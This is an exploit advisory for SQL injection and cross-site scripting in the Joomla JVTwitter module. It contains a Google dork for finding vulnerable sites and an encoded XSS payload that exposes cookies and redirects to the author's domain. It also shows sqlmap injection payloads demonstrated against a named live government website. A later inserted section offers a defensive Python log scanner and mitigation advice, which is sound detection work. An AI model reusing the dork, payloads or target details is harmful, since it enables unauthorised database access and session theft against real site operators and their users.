#############################################################
# Exploit Title: Joomla JVTwitter - SQL Injection & XSS Vulnerabilities
# Google Dork: inurl:mod_jvtwitter/jvtwitter.php?id=
# Date: 2020-11-07
# Exploit Author: Gh05t666nero
# Team: IndoGhostSec
# Vendor: joomlavi.com
# Software Version: *
# Software Link: https://joomlavi.com/documentation/joomla-extensions/jv-twitter.html
# Tested on: Linux 4.14.117-perf+ #2 SMP PREEMPT CST 2020 aarch64 Android
#############################################################
[*] Vuln Info:
==============
SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).
Cross-Site Scripting (XSS) is an attack in which an attacker injects malicious client-side code into a web page.
Attackers use XSS vulnerabilities to steal user data, take control of user sessions, run malicious code, or as a major component of phishing scams.
#############################################################
[*] Exploit:
============
/modules/mod_jvtwitter/jvtwitter.php?id=[Number][SQL-I]
/modules/mod_jvtwitter/jvtwitter.php?id=%22%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%27%47%68%30%35%74%36%36%36%6E%65%72%6F%27%2C%63%6F%6F%6B%69%65%2C%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%73%3A%2F%2F%61%6E%6F%6E%73%65%63%2E%6D%79%2E%69%64%22%29%3B%3E
#############################################################
[*] Demo:
=========
https://www.fhamortgage.gov.ng/modules/mod_jvtwitter/jvtwitter.php?id=110
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=110 AND 6499=6499-- xBNX
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=110 AND (SELECT 7924 FROM(SELECT COUNT(*),CONCAT(0x7178707171,(SELECT (ELT(7924=7924,1))),0x717a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Anel
---
[08:01:02] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
https://www.fhamortgage.gov.ng/modules/mod_jvtwitter/jvtwitter.php?id=%22%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%27%47%68%30%35%74%36%36%36%6E%65%72%6F%27%2C%63%6F%6F%6B%69%65%2C%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%73%3A%2F%2F%61%6E%6F%6E%73%65%63%2E%6D%79%2E%69%64%22%29%3B%3E
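
For defenders: both issues above are reached through the id parameter of jvtwitter.php, and a legitimate id is a plain integer, so any request to that path with a non-digit id is worth triaging. The following is an added example, not part of the original advisory or the vendor's code; the combined log format, the function names and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

MODULE_PATH = "/modules/mod_jvtwitter/jvtwitter.php"  # path from the advisory
# Client, request target and status from a combined-format log line (assumed format).
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
SQL_RE = re.compile(r"\b(and|or|union|select|from|sleep|benchmark)\b|--|/\*|#", re.I)
MARKUP_RE = re.compile(r"[<>]|\bon\w+\s*=", re.I)

def classify_id(value):
    """Return 'ok' for a plain integer id, else a coarse reason for triage."""
    value = unquote(value)  # extra decode so double-encoded input is seen in clear
    if re.fullmatch(r"\d{1,10}", value):
        return "ok"
    if SQL_RE.search(value):
        return "sql"
    if MARKUP_RE.search(value):
        return "markup"
    return "non-numeric"

def scan(lines):
    """Return (client, status, reason, decoded id) per suspicious module hit.
    endswith() on the path also covers Joomla installed in a subdirectory."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if not unquote(url.path).endswith(MODULE_PATH):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("id", []):
            reason = classify_id(raw)
            if reason != "ok":
                findings.append((client, int(status), reason, unquote(raw)))
    return findings

# Constructed sample log lines (documentation-range addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Nov/2020:08:00:01 +0000] "GET /modules/mod_jvtwitter/jvtwitter.php?id=110 HTTP/1.1" 200 512',
    '198.51.100.7 - - [07/Nov/2020:08:01:02 +0000] "GET /modules/mod_jvtwitter/jvtwitter.php?id=110%20AND%201%3D1 HTTP/1.1" 200 512',
    '198.51.100.7 - - [07/Nov/2020:08:01:05 +0000] "GET /modules/mod_jvtwitter/jvtwitter.php?id=%22%3E%3Cb%3Ex%3C%2Fb%3E HTTP/1.1" 200 498',
    '203.0.113.5 - - [07/Nov/2020:08:02:00 +0000] "GET /joomla/modules/mod_jvtwitter/jvtwitter.php?id=%2531%2527 HTTP/1.1" 500 0',
    '192.0.2.10 - - [07/Nov/2020:08:03:00 +0000] "GET /index.php?id=1%27 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

The same digits-only rule can be enforced in front of the module (WAF or rewrite rule) as a stopgap; it does not replace casting id to an integer, using bound parameters and encoding output in the module itself.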
#############################################################
[*] Contact:
============
# Website: www.anonsec.my.id
# Telegram: t.me/Gh05t666nero
# Instagram: instagram.com/ojan_cxs
# Twitter: twitter.com/Gh05t666nero1